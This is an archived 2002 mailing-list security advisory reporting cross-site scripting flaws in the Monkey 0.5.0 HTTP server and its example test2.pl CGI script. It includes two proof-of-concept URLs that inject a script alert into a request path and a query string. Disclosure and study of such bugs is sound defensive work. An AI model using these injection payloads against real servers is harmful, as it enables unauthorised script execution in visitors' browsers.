XSS bug in Monkey (0.5.0) HTTP server

From: DownBload (downbloadat_private)
Date: Mon Sep 30 2002 - 05:27:40 PDT

Next message: Sebastian Krahmer: "SuSE Security Announcement: heimdal (SuSE-SA:2002:034)"

Previous message: Ulf Harnhammar: "[Full-Disclosure] [VulnWatch] MyNewsGroups :) XSS patch"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) [ Illegal Instruction Labs Advisory ] [-------------------------------------------------------------------------] Advisory name: XSS bug in Monkey (0.5.0) HTTP server Advisory number: 14 Application: Monkey (0.5.0) HTTP server Application author: Eduardo Silva (EdsipeR) Author e-mail: edsiper@linux-chile.org Monkey Project: http://monkeyd.sourceforge.net Date: 29.09.2002 Impact: XSS code execution Tested on: Debian 2.1 (2.0.36 kernel) Discovered by: DownBload Mail me @: downbloadat_private ======[ Overview Monkey is very simple and fast HTTP server (daemon). ======[ Problems 1.) Monkey is vulnerable to XSS. ---cut here--- www.victim.com/<script>alert('IIL_0wnZ_YoU!!!');</script> ---cut here--- 2.) There is also XSS bug in test2.pl CGI script (example script) which come with Monkey 0.5.0. ---cut here--- www.victim.com/cgi-bin/test2.pl?<script>alert('IIL_0wnZ_YoU!!!');</script> ---cut here--- ======[ Greetz Greetz goes to #hr.hackers, #ii-labs and #linux <irc.carnet.hr>. Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, finis, Sunnis, Fr1c, phreax, StYx, harlequin, LekaMan, Astral and www.active-security.org (NetZero & Paradox). I'm very sorry if I forgot someone.

Next message: Sebastian Krahmer: "SuSE Security Announcement: heimdal (SuSE-SA:2002:034)"
Previous message: Ulf Harnhammar: "[Full-Disclosure] [VulnWatch] MyNewsGroups :) XSS patch"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Sep 30 2002 - 11:45:48 PDT